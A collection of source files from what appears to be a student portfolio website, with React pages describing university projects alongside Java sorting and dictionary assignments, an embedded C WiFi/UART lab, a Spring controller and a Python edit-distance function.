* Get the character representation for this State. Used for loading map text files.
* @return character representation for this State
*/
public char toChar(){
return 'S';
}
}
<file_sep>/src/Components/CPRE281/CPRE281.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import ThreebitPAregister from './3bitPAregister.png';
import SevenSegDecoder from './7segDecoder.png';
import EightThreeEncoder from './8-3encoder.png';
import comparator from './comparator.png';
import counter from './counter.png';
import decoder from './decoder.png';
import FinalCircuit from './FinalCircuit.png';
import registerFile from './registerFile.png';
const Title = Typography.Title;
export default class CPRE281 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Digital Logic - CPRE 281</Title>
<Title level={2}>Digital Combination Lock Project</Title>
<Title level={4}>Technology: VHDL, Quartus Prime, FPGA board</Title>
In this class we used a field programmable gate array board (FPGA) to implement basic
logic components that comprises computer hardware. We used a program call Quartus Prime
to create the block diagrams of the components and sent them to the board.
<br></br><br></br>
For the final project, I created a digital combination lock using the switches, the
seven-segment displays, and the LEDs on the board. The user could set a combination,
enter a combination, and reset a combination.
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={24}>
<Title level={4}>Final Circuit Diagram</Title>
<img width='100%' src={FinalCircuit} alt=''/>
<Title level={4}>Register File</Title>
<img width='100%' src={registerFile} alt=''/>
<Title level={4}>Decoder</Title>
<img width='100%' src={decoder} alt=''/>
<Title level={4}>Counter</Title>
<img width='100%' src={counter} alt=''/>
<Title level={4}>Comparator</Title>
<img width='100%' src={comparator} alt=''/>
<Title level={4}>8-3 Encoder</Title>
<img width='100%' src={EightThreeEncoder} alt=''/>
<Title level={4}>Seven Segment Decoder</Title>
<img width='50%' src={SevenSegDecoder} alt=''/>
<Title level={4}>Three Bit Parallel Access Register</Title>
<img width='100%' src={ThreebitPAregister} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS228/Project2/InsertionSorter.java
package edu.iastate.cs228.hw2;
import java.io.FileNotFoundException;
import java.util.InputMismatchException;
/**
*
* @author <NAME>
*
*/
/**
*
* This class implements insertion sort.
*
*/
public class InsertionSorter extends AbstractSorter {
// Other private instance variables if you need ...
/**
* The two constructors below invoke their corresponding superclass
* constructors. They also set the instance variables algorithm and
* outputFileName in the superclass.
*/
/**
* Constructor takes an array of points.
*
* @param pts
*/
public InsertionSorter(Point[] pts) {
super(pts);
outputFileName = "insert.txt";
algorithm = "insertion sorter ";
}
/**
* Constructor reads points from a file.
*
* @param inputFileName
* name of the input file
* @throws FileNotFoundException
* @throws InputMismatchException
*/
public InsertionSorter(String inputFileName) throws InputMismatchException, FileNotFoundException {
super(inputFileName);
outputFileName = "insert.txt";
algorithm = "insertion sorter ";
}
/**
* Perform insertion sort on the array points[] of the parent class
* AbstractSorter.
*
* @param order
* 1 by x-coordinate 2 by polar angle
*/
@Override
public void sort(int order) {
if (order < 1 || order > 2) {
throw new IllegalArgumentException("Invalid input");
}
else{
if(order == 1){
sortByAngle = false;
}
else{
sortByAngle = true;
}
setComparator();
long startTime = System.nanoTime();
int j;
for(int i = 1; i < points.length; i++){
Point t = points[i];
for(j = i - 1; j >= 0 && pointComparator.compare(t, points[j]) == -1; j--){
points[j + 1] = points[j];
}
points[j + 1] = t;
}
long endTime = System.nanoTime();
sortingTime = endTime - startTime;
try {
writePointsToFile();
} catch (FileNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
}
}
<file_sep>/src/ClassComponents/CPRE381/ProjectA/ProjectA.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import Diagram from './Diagram.png';
import instructions from './Project-A-Instruction.pdf';
import ProjectFiles from './projectA.zip';
const Title = Typography.Title;
export default class ProjectA extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Single-Cycle MIPS Processor - Project A</Title>
<Title level={4}>Technology: VHDL, Quartus Prime, Assembly</Title>
For this project, my teammate and I created a MIPS processor that reads 32 bit instruction
sets. Single-cycle means that the processor is only capable of executing one instruction
per clock cycle. We connected previously created logic components together in Quartus Prime,
converted it to a VHDL file and ran it in a separate program.
<br></br>
<a href={instructions} download="Project-A-Instruction.pdf">Download project description</a>
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>High-Level Block Diagram</Title>
<img width='100%' src={Diagram} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS228/Project4/Dictionary.java
package edu.iastate.cs228.hw4;
import java.util.Arrays;
import java.util.Scanner;
import java.io.FileNotFoundException;
import java.io.File;
/**
* @author XXXXX
*
* An application class
*/
public class Dictionary {
public static void main(String[] args) throws FileNotFoundException {
File infile = new File(args[0]);
Scanner inLine = new Scanner(infile);
EntryTree<Character, String> tree = new EntryTree<Character, String>();
while(inLine.hasNextLine()){
String line = inLine.nextLine();
Scanner inWord = new Scanner(line);
boolean add = false;
boolean remove = false;
boolean search = false;
boolean prefix = false;
while(inWord.hasNext()){
String word = inWord.next();
if(word.equals("add")) add = true;
if(word.equals("remove")) remove = true;
if(word.equals("search")) search = true;
if(word.equals("prefix")) prefix = true;
if(word.equals("showTree")){
System.out.println("Command: showTree");
System.out.println("Result from a showTree: ");
tree.showTree();
System.out.println("\n");
}
if(add){
String keys = inWord.next();
String value = inWord.next();
System.out.println("Command: add " + keys + " " + value);
Character[] keyarr = new Character[keys.length()];
for(int i = 0; i < keys.length(); i++){
keyarr[i] = keys.charAt(i);
}
boolean result = tree.add(keyarr, value);
System.out.println("Result from an add: " + result + "\n");
}
if(remove){
String keys = inWord.next();
System.out.println("Command: remove " + keys);
Character[] keyarr = new Character[keys.length()];
for(int i = 0; i < keys.length(); i++){
keyarr[i] = keys.charAt(i);
}
String result = tree.remove(keyarr);
System.out.println("Result from a remove: " + result + "\n");
}
if(search){
String keys = inWord.next();
System.out.println("Command: search " + keys);
Character[] keyarr = new Character[keys.length()];
for(int i = 0; i < keys.length(); i++){
keyarr[i] = keys.charAt(i);
}
String result = tree.search(keyarr);
System.out.println("Result from a search: " + result + "\n");
}
if(prefix){
String keys = inWord.next();
System.out.println("Command: prefix " + keys);
Character[] keyarr = new Character[keys.length()];
for(int i = 0; i < keys.length(); i++){
keyarr[i] = keys.charAt(i);
}
Character[] result = tree.prefix(keyarr);
String s = "";
for(int i = 0; i < result.length; i++){
s = s + result[i];
}
System.out.println("Result from a prefix: " + s + "\n");
}
}
inWord.close();
}
inLine.close();
}
}<file_sep>/src/ClassComponents/CPRE288/Lab5/lab5.c
/**
*CPRE 288 Lab 5
*
* @author <NAME>, <NAME>, <NAME>
* @date 08/07/2016
*/
#include <stdlib.h>
#include <stdbool.h>
#include "button.h"
#include "lcd.h"
#include "Timer.h"
#include "uart.h"
#include "wifi.h"
void initPortB (void){
SYSCTL_RCGCGPIO_R = 0x02;
SYSCTL_RCGCUART_R = 0x02;
GPIO_PORTB_AFSEL_R = 0x03;
GPIO_PORTB_PCTL_R = 0x00000011;
GPIO_PORTB_DEN_R = 0x03;
}
int main (void){
char DataIn[20];
char PSK[] = "Password33";
int i = 0;
initPortB();
//uart_init();
lcd_init();
button_init();
WiFi_start(PSK);
char lastButton;
char button;
while (1){
if (!(UART1_FR_R & 0x10)){ //If receive FIFO not empty receive data
DataIn[i] = uart_receive();
i++;
lcd_printf("%c \n Index:%d", DataIn[i-1], i);
}
if (i == 20){
lcd_printf("%s", DataIn);
i = 0;
}
if (DataIn[i-1] == '\r'){ //Checks to see if the latest key returned was the return key.
DataIn[i-1] = '\0';
lcd_printf("%s", DataIn); //Prints data out to LCD screen
uart_sendChar('\n'); //Sends string of characters back to putty after setting new line and carriage return.
uart_sendStr(DataIn);
i = 0; //Resets character count
}
button = button_getButton();
if(lastButton != button){
if(button == 0x06){
uart_sendStr("Yes");
timer_waitMillis(200);
}
else if(button == 0x05){
uart_sendStr("No");
timer_waitMillis(200);
}
else if(button == 0x04){
uart_sendStr("Blue, no green, Ahhhh!!!!");
timer_waitMillis(200);
}
else if(button == 0x03){
uart_sendStr("Hello");
timer_waitMillis(200);
}
else if(button == 0x02){
uart_sendStr("Firetruck");
timer_waitMillis(200);
}
else if(button == 0x01){
uart_sendStr("aliens");
timer_waitMillis(200);
}
}
lastButton = button;
}
}
<file_sep>/src/Components/ComS363/ComS363.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import appSS1 from './appSS1.png';
import appSS2 from './appSS2.png';
import appSS3 from './appSS3.png';
import appSS4 from './appSS4.png';
import appSS5 from './appSS5.png';
import appSS6 from './appSS6.png';
import appSS7 from './appSS7.png';
import appSS8 from './appSS8.png';
import appSS9 from './appSS9.png';
import appSS10 from './appSS10.png';
import appSS11 from './appSS11.png';
import appSS12 from './appSS12.png';
import cipherQueries from './cipherQueries.png';
import ProjectFiles from './ComS363project.zip';
import ddlSS1 from './ddlSS1.png';
import ddlSS2 from './ddlSS2.png';
import ERdiagram from './ERdiagram.png';
import insertData from './insertData.png';
import projectDDL from './projectDDL.sql';
import projectInsert from './projectInsert.sql';
import Q1jsp from './Q1.jsp';
import Q1png from './Q1.png';
import Queries from './Queries.cipher';
import querySolutionsPng from './querySolutions.png';
import querySolutionsSql from './querySolutions.sql';
import resultQ1png from './resultQ1.png';
import resultQ1 from './ResultQ1.jsp';
import SQLqueries from './SQLqueries.png';
const Title = Typography.Title;
export default class ComS363 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Database Management Systems - Computer Science 363</Title>
<Title level={3}>Database and Web Application Project</Title>
<Title level={4}>Technology: HTML, Java, MySQL, Neo4j Graph Database, Eclipse, Apache Server</Title>
This project involved designing entity-relation diagrams (ER diagram), implementing the diagram
in SQL DDL statements, entering over 250,000 rows of real Twitter data into the database, performing
complicated SQL queries on the data, optimizing these queries, and creating the same queries for a
corresponding Neo4j graph database.
<br></br><br></br>
For the final part of the project, my team (two others) and I used a local Apache server to make a
web application in Eclipse using JSP files (Java server page) that connected to the database. The
app allowed the user to perform the same queries as mentioned earlier on the Twitter database.
<br></br>
<a href={ProjectFiles} download="ProjectFile.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>The entity-relation diagram</Title>
<img width='100%' src={ERdiagram} alt=''/>
<Title level={4}>projectDDL.sql (click on image to download file): This is the SQL file that implements the above design</Title>
<a href={projectDDL} download="projectDDL.sql">
<img width='100%' src={ddlSS1} alt=''/>
<img width='100%' src={ddlSS2} alt=''/>
</a>
<Title level={4}>projectInsert.sql (click on image to download file): This is the SQL file that inserts the data into the database from the specified csv files</Title>
<a href={projectInsert} download="projectInsert.sql">
<img width='100%' src={insertData} alt=''/>
</a>
<Title level={4}>These are the descriptions for the SQL queries that we made on the Tweet database</Title>
<img width='100%' src={SQLqueries} alt=''/>
<Title level={4}>querySolutions.sql (click on image to download file): This file contains the queries that yield the outputs of the descriptions above</Title>
<a href={querySolutionsSql} download="querySolutions.sql">
<img width='100%' src={querySolutionsPng} alt=''/>
</a>
<Title level={4}>
Queries.cipher (click on image to download file): These are the corresponding Neo4j (graph database) cipher queries.
They give the same results as the SQL queries but are written for a graph database
</Title>
<a href={Queries} download="cipherQueries.cypher">
<img width='100%' src={cipherQueries} alt=''/>
</a>
<Title level={4}>The login page for the web app:</Title>
<img width='100%' src={appSS1} alt=''/>
<Title level={4}>After the user logs in, they will be able to run any of the queries on the database:</Title>
<img width='100%' src={appSS2} alt=''/>
<Title level={4}>
Q1.jsp (click on image to download file): HTML description for the
user input of the first query on the web application
</Title>
<a href={Q1jsp} download="Q1.jsp">
<img width='100%' src={Q1png} alt=''/>
<img width='100%' src={appSS3} alt=''/>
</a>
<Title level={4}>
ResultQ1.jsp (click on image to download file): The page that shows the results
of the query after the user enters the information
</Title>
<a href={resultQ1} download="ResultQ1.jsp">
<img width='100%' src={resultQ1png} alt=''/>
</a>
<Title level={4}>Results of Q1</Title>
<img width='100%' src={appSS4} alt=''/>
<Title level={4}>Results of Q3:</Title>
<img width='100%' src={appSS5} alt=''/>
<Title level={4}>Results of Q6:</Title>
<img width='100%' src={appSS6} alt=''/>
<Title level={4}>Results of Q9:</Title>
<img width='100%' src={appSS7} alt=''/>
<Title level={4}>Results of Q10:</Title>
<img width='100%' src={appSS8} alt=''/>
<Title level={4}>Results of Q11:</Title>
<img width='100%' src={appSS9} alt=''/>
<Title level={4}>Results of Q15:</Title>
<img width='100%' src={appSS10} alt=''/>
<Title level={4}>Results of Q18:</Title>
<img width='100%' src={appSS11} alt=''/>
<Title level={4}>Results of Q23:</Title>
<img width='100%' src={appSS12} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS227/ComS227.js
import React from 'react';
import { Layout, Menu, Breadcrumb } from 'antd';
import { MenuOutlined, HomeOutlined } from '@ant-design/icons';
import '../../Components/HomePage/HomePage.css';
import { Redirect } from 'react-router-dom';
import A1 from './A1/A1.js';
import A2 from './A2/A2.js';
import A3 from './A3/A3.js';
import A4 from './A4/A4.js';
import TallyClass from './TallyClass/TallyClass.js';
import TransClasses from './TransClasses/TransClasses.js';
const { Header, Content, Sider } = Layout;
export default class ComS227 extends React.Component {
state = {
collapsed: false,
currentPage: "A1"
}
onCollapse = collapsed => {
this.setState({ collapsed });
};
handleHomeClick = () => {
this.setState({
currentPage: "Home"
});
}
handleA1Click = () => {
this.setState({
currentPage: "A1"
});
}
handleA2Click = () => {
this.setState({
currentPage: "A2"
});
}
handleA3Click = () => {
this.setState({
currentPage: "A3"
});
}
handleA4Click = () => {
this.setState({
currentPage: "A4"
});
}
handleTallyClassClick = () => {
this.setState({
currentPage: "TallyClass"
});
}
handleTransClassesClick = () => {
this.setState({
currentPage: "TransClasses"
});
}
render() {
let page;
let width;
let pathItem1 = "default";
let pathItem2 = "default";
if (this.state.currentPage === "Home") {
return <Redirect to={"/Home"}/>
}
else if (this.state.currentPage === "A1") {
page = <A1/>
}
else if (this.state.currentPage === "A2") {
page = <A2/>
}
else if (this.state.currentPage === "A3") {
page = <A3/>
}
else if (this.state.currentPage === "A4") {
page = <A4/>
}
else if (this.state.currentPage === "TallyClass") {
page = <TallyClass/>
}
else if (this.state.currentPage === "TransClasses") {
page = <TransClasses/>
}
if (this.props.location.state.path === "Categories/Java") {
pathItem1 = "Categories"
pathItem2 = "Java"
}
else if (this.props.location.state.path === "Years/Freshman") {
pathItem1 = "Years"
pathItem2 = "Freshman"
}
if (this.state.collapsed === true) {
width = 80;
}
else {
width = 400;
}
return (
<Layout style={{ minHeight: '100vh' }}>
<Sider
collapsible
collapsed={this.state.collapsed}
onCollapse={this.onCollapse}
breakpoint="xl"
width="400"
style={{
overflow: 'auto',
position: 'fixed',
height: '100vh',
left: 0,
}}
>
{this.state.collapsed===true ?
<div className="logo-collapsed">
BA
</div>
:
<div className="logo-expanded">
<NAME>
</div>
}
<Menu theme="dark" defaultSelectKeys={['1']} mode="inline">
<Menu.Item key="7" icon={<HomeOutlined/>} onClick={this.handleHomeClick}>
Home
</Menu.Item>
<Menu.Divider/>
<Menu.Item key="1" icon={<MenuOutlined/>} onClick={this.handleA1Click}>
Simple Television Class - Assignment 1
</Menu.Item>
<Menu.Item key="2" icon={<MenuOutlined/>} onClick={this.handleA2Click}>
Football Game Class - Assignment 2
</Menu.Item>
<Menu.Item key="3" icon={<MenuOutlined/>} onClick={this.handleA3Click}>
Color Flow Game - Assignment 3
</Menu.Item>
<Menu.Item key="4" icon={<MenuOutlined/>} onClick={this.handleA4Click}>
Snake Game - Assignment 4
</Menu.Item>
<Menu.Item key="5" icon={<MenuOutlined/>} onClick={this.handleTallyClassClick}>
Tally Class - Assignment 1
</Menu.Item>
<Menu.Item key="6" icon={<MenuOutlined/>} onClick={this.handleTransClassesClick}>
Transformation Classes - Assignment 2
</Menu.Item>
</Menu>
</Sider>
<Layout className="site-layout" style={{marginLeft:width}}>
<Header className="site-layout-background" style={{ padding: 0 }}/>
<Content style={{ margin: '0 16px' }}>
{this.state.currentPage === "A1" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Object-Oriented Programming - Com S 227</Breadcrumb.Item>
<Breadcrumb.Item>Simple Television Class - Assignment 1</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "A2" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Object-Oriented Programming - Com S 227</Breadcrumb.Item>
<Breadcrumb.Item>Football Game Class - Assignment 2</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "A3" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Object-Oriented Programming - Com S 227</Breadcrumb.Item>
<Breadcrumb.Item>Color Flow Game - Assignment 3</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "A4" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Object-Oriented Programming - Com S 227</Breadcrumb.Item>
<Breadcrumb.Item>Snake Game - Assignment 4</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "TallyClass" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Object-Oriented Programming - Com S 227</Breadcrumb.Item>
<Breadcrumb.Item>Tally Class - Assignment 1</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "TransClasses" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Object-Oriented Programming - Com S 227</Breadcrumb.Item>
<Breadcrumb.Item>Transformation Classes - Assignment 2</Breadcrumb.Item>
</Breadcrumb>
}
<div className="site-layout-background" style={{ padding: 24, minHeight: 360 }}>
{page}
</div>
</Content>
</Layout>
</Layout>
);
}
}<file_sep>/src/Components/AWSAPI/UserController.java
package com.aws.codestar.projecttemplates.controller;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;
import com.aws.codestar.projecttemplates.dao.UserRepo;
import com.aws.codestar.projecttemplates.model.User;
@RestController
public class UserController {
@Autowired
UserRepo rep;
@RequestMapping(method = RequestMethod.POST, path = "/addUser")
public String saveOwner(User user) {
rep.save(user);
return "New User "+ user.getName() + " Saved";
}
@RequestMapping(method = RequestMethod.GET, path = "/users")
public List<User> getUsers() {
List<User> users = (List<User>) rep.findAll();
System.out.println(users.size());
return users;
}
}
<file_sep>/src/Components/CPRE186/GUItest.java
package gui;
public class GUItest {
public static void main(String[] args){
Buttons b = new Buttons();
b.GUI();
}
}
<file_sep>/src/ClassComponents/CPRE288/Lab5/Lab5.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import lab5C from './lab5.c';
import lab5PNG from './lab5.png';
import ProjectFiles from './lab5Files.zip';
import WiFiC from './WiFi.c';
import WiFiPNG from './WiFi.png';
const Title = Typography.Title;
export default class Lab5 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Implementing WiFi Connectivity - Lab 5</Title>
<Title level={4}>Technology: C, Embedded Systems</Title>
In this project, my team and I configured the WiFi cabability of the robot
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>lab5.c (click on image to download file)</Title>
<a href={lab5C} download="lab5.c">
<img width='100%' src={lab5PNG} alt=''/>
</a>
<Title level={4}>WiFi.c (click on image to download file)</Title>
<a href={WiFiC} download="WiFi.c">
<img width='100%' src={WiFiPNG} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS311/Project2/q4.py
def line_edits(s1, s2):
"""function for generating the descriptions of line edits"""
l1 = s1.splitlines()
l2 = s2.splitlines()
result = editDistance(l1, l2)
result = result[::-1]
return result
def editDistance(l1, l2):
"""Helper function to generate the table for line edits"""
cache = [[None for i in range(len(l2) + 1)] for j in range(len(l1) + 1)]
for row in range(len(l1) + 1):
for col in range(len(l2) + 1):
if row == 0 and col == 0:
cache[row][col] = 0
elif col == 0:
cache[row][col] = row
elif row == 0:
cache[row][col] = col
elif l1[row - 1] == l2[col - 1]:
cache[row][col] = cache[row - 1][col - 1]
else:
a = cache[row - 1][col]
b = cache[row][col - 1]
c = cache[row - 1][col - 1]
cache[row][col] = min(a, b, c) + 1
return findResult(l1, l2, cache)
def findResult(l1, l2, table):
"""Helper function to find the result after the table has been built"""
rowH = len(l1)
colH = len(l2)
resultH = []
while rowH != 0 or colH != 0:
if colH == 0:
action = ('D', l1[rowH - 1], "")
resultH.append(action)
rowH = rowH - 1
elif rowH == 0:
action = ('I', "", l2[colH - 1])
resultH.append(action)
colH = colH - 1
elif l1[rowH - 1] == l2[colH - 1]:
action = ('T', l1[rowH - 1], l2[colH - 1])
resultH.append(action)
rowH = rowH - 1
colH = colH - 1
else:
rowH, colH, resultH = otherHelper(table, (l1, l2), rowH, colH, resultH)
return resultH
def otherHelper(table, l, rowH, colH, resultH):
"""helper method to shorten the above function"""
l1 = l[0]
l2 = l[1]
delete = table[rowH - 1][colH]
insert = table[rowH][colH - 1]
sub = table[rowH - 1][colH - 1]
if delete <= insert and delete <= sub:
action = ('D', l1[rowH - 1], "")
resultH.append(action)
rowH = rowH - 1
elif insert < delete and insert <= sub:
action = ('I', "", l2[colH - 1])
resultH.append(action)
colH = colH - 1
elif sub < delete and sub < insert:
action = ('S', l1[rowH - 1], l2[colH - 1])
resultH.append(action)
rowH = rowH - 1
colH = colH - 1
return rowH, colH, resultH
s1 = "Line1\nLine2\nLine3\nLine4\n"
s2 = "Line1\nLine3\nLine4\nLine5\n"
s3 = "Line1\nLine2\nLine3\nLine4\n"
s4 = "Line5\nLine4\nLine3\n"
s5 = "Line1\n"
s6 = ""
table = line_edits(s1, s2)
for row in table:
print(row)<file_sep>/src/Components/AlienInvasion/AlienInvasion.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import demo from './aiDemo2.mov';
import alienPNG from './alien.png';
import alienPY from './alien.py';
import alienInvasionPY from './alien_invasion.py';
import ProjectFiles from './alien_invasion.zip';
import alienInvasionSS1 from './alienInvasionSS1.png';
import alienInvasionSS2 from './alienInvasionSS2.png';
import alienInvasionSS3 from './alienInvasionSS3.png';
import bulletPY from './bullet.py';
import bulletPNG from './bullet.png';
import buttonPY from './button.py';
import buttonPNG from './button.png';
import gameStatsPY from './game_stats.py';
import gameStatsPNG from './gameStats.png';
import scoreboardPNG from './scoreboard.png';
import scoreboardPY from './scoreboard.py';
import settingsPNG from './settings.png';
import settingsPY from './settings.py';
import shipPNG from './ship.png';
import shipPY from './ship.py';
const Title = Typography.Title;
export default class AlienInvasion extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Alien Invasion Game</Title>
<Title level={4}>Technology: Python, Pygame, Visual Studio Code</Title>
This game features aliens falling from the top of the screen, a ship that moves
left and right when the keyboard arrows are pressed, and the ship fires bullets
everytime the space bar is pressed. The objective is to shoot down all the aliens
before they reach the bottom of the screen. After the user eliminates the aliens, a new
level is started and the aliens become faster each time. The amount of ships the user
has left is indicated in the top left of the screen. I made this game using the Pygame
development kit, which makes it much easier to manage game objects in Python. This
project is based off of a tutorial I followed in "Python Crash Course" by <NAME>.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={3}>Demo</Title>
<video controls width='100%'>
<source src={demo}/>
</video>
<Title level={4}>alien_invasion.py: (The main class that is run)</Title>
<a href={alienInvasionPY} download="alien_invasion.py">
<img width='100%' src={alienInvasionSS1} alt=''/>
<img width='100%' src={alienInvasionSS2} alt=''/>
<img width='100%' src={alienInvasionSS3} alt=''/>
</a>
<Title level={4}>ship.py</Title>
<a href={shipPY} download="ship.py">
<img width='100%' src={shipPNG} alt=''/>
</a>
<Title level={4}>alien.py</Title>
<a href={alienPY} download="alien.py">
<img width='100%' src={alienPNG} alt=''/>
</a>
<Title level={4}>bullet.py</Title>
<a href={bulletPY} download="bullet.py">
<img width='100%' src={bulletPNG} alt=''/>
</a>
<Title level={4}>settings.py</Title>
<a href={settingsPY} download="settings.py">
<img width='100%' src={settingsPNG} alt=''/>
</a>
<Title level={4}>game_stats.py</Title>
<a href={gameStatsPY} download="game_stats.py">
<img width='100%' src={gameStatsPNG} alt=''/>
</a>
<Title level={4}>scoreboard.py</Title>
<a href={scoreboardPY} download="scoreboard.py">
<img width='100%' src={scoreboardPNG} alt=''/>
</a>
<Title level={4}>button.py</Title>
<a href={buttonPY} download="button.py">
<img width='100%' src={buttonPNG} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS228/Project2/AbstractSorter.java
package edu.iastate.cs228.hw2;
/**
*
* @author <NAME>
*
*/
import java.util.Comparator;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.PrintWriter;
import java.lang.IllegalArgumentException;
import java.util.InputMismatchException;
import java.util.Scanner;
/**
*
* This abstract class is extended by SelectionSort, InsertionSort, MergeSort,
* and QuickSort. It stores the input (later on the sorted) sequence and records
* the employed sorting algorithm, the comparison method, and the time spent on
* sorting.
*
*/
public abstract class AbstractSorter {
protected Point[] points; // Array of points operated on by a sorting
// algorithm.
// The number of points is given by
// points.length.
protected String algorithm = null; // "selection sort", "insertion sort",
// "merge sort", or "quick sort".
// Initialized by a subclass
// constructor.
protected boolean sortByAngle; // true if last sort was done by polar angle
// and false
// if by x-coordinate
protected String outputFileName; // "select.txt", "insert.txt", "merge.txt",
// or "quick.txt"
protected long sortingTime; // execution time in nanoseconds.
protected Comparator<Point> pointComparator; // comparator which compares
// polar angle if
// sortByAngle == true and
// x-coordinate if
// sortByAngle == false
public Point lowestPoint; // lowest point in the array, or in case of a
// tie, the
// leftmost of the lowest points. This point is
// used
// as the reference point for polar angle based
// comparison.
// Add other protected or private instance variables you may need.
protected AbstractSorter() {
// No implementation needed. Provides a default super constructor to
// subclasses.
// Removable after implementing SelectionSorter, InsertionSorter,
// MergeSorter, and QuickSorter.
}
/**
* This constructor accepts an array of points as input. Copy the points
* into the array points[]. Sets the instance variable lowestPoint.
*
* @param pts
* input array of points
* @throws IllegalArgumentException
* if pts == null or pts.length == 0.
*/
protected AbstractSorter(Point[] pts) throws IllegalArgumentException {
if(pts == null || pts.length == 0){
throw new IllegalArgumentException("Invalid input");
}
else{
points = pts.clone();
int pos = 0;
for(int i = 0; i < points.length; i++){
if(points[i].getY() < points[pos].getY()){
pos = i;
}
if(points[i].getY() == points[pos].getY() && points[i].getX() < points[pos].getX()){
pos = i;
}
}
lowestPoint = points[pos];
}
}
/**
* This constructor reads points from a file. Sets the instance variables
* lowestPoint and outputFileName.
*
* @param inputFileName
* @throws FileNotFoundException
* @throws InputMismatchException
* when the input file contains an odd number of integers
*/
protected AbstractSorter(String inputFileName) throws FileNotFoundException, InputMismatchException {
File fileName = new File(inputFileName);
if(fileName.exists() == false){
throw new FileNotFoundException("File does not exist");
}
Scanner in = new Scanner(fileName);
int count = 0;
while(in.hasNextLine()){
String s = in.nextLine();
Scanner in2 = new Scanner(s);
while(in2.hasNextInt()){
in2.nextInt();
count++;
}
in2.close();
}
in.close();
if((count % 2) != 0){
throw new InputMismatchException("File contains odd number of digits");
}
else{
String sIn = "";
Scanner input = new Scanner(fileName);
while(input.hasNextLine()){
String s = input.nextLine();
Scanner input2 = new Scanner(s);
while(input2.hasNextInt()){
sIn = sIn + " " + input2.nextInt();
}
input2.close();
}
input.close();
Scanner lineIn = new Scanner(sIn);
Point[] points = new Point[count/2];
int i = 0;
while(lineIn.hasNextInt()){
Point p = new Point(lineIn.nextInt(), lineIn.nextInt());
points[i] = p;
i++;
}
lineIn.close();
this.points = points.clone();
int pos = 0;
for(int j = 0; j < points.length; j++){
if(points[j].getY() < points[pos].getY()){
pos = j;
}
if(points[j].getY() == points[pos].getY() && points[j].getX() < points[pos].getX()){
pos = j;
}
}
lowestPoint = points[pos];
}
}
/**
* Sorts the elements in points[].
*
* a) in the non-decreasing order of x-coordinate if order == 1 b) in the
* non-decreasing order of polar angle w.r.t. lowestPoint if order == 2
* (lowestPoint will be at index 0 after sorting)
*
* Sets the instance variable sortByAngle based on the value of order. Calls
* the method setComparator() to set the variable pointComparator and use it
* in sorting. Records the sorting time (in nanoseconds) using the
* System.nanoTime() method. (Assign the time to the variable sortingTime.)
*
* @param order
* 1 by x-coordinate 2 by polar angle w.r.t lowestPoint
*
* @throws IllegalArgumentException
* if order is less than 1 or greater than 2
*/
public abstract void sort(int order) throws IllegalArgumentException;
/**
* Outputs performance statistics in the format:
*
* <sorting algorithm> <size> <time>
*
* For instance,
*
* selection sort 1000 9200867
*
* Use the spacing in the sample run in Section 2 of the assignment
* description.
*/
public String stats() {
String s = "" + algorithm + " " + points.length + " " + sortingTime;
return s;
}
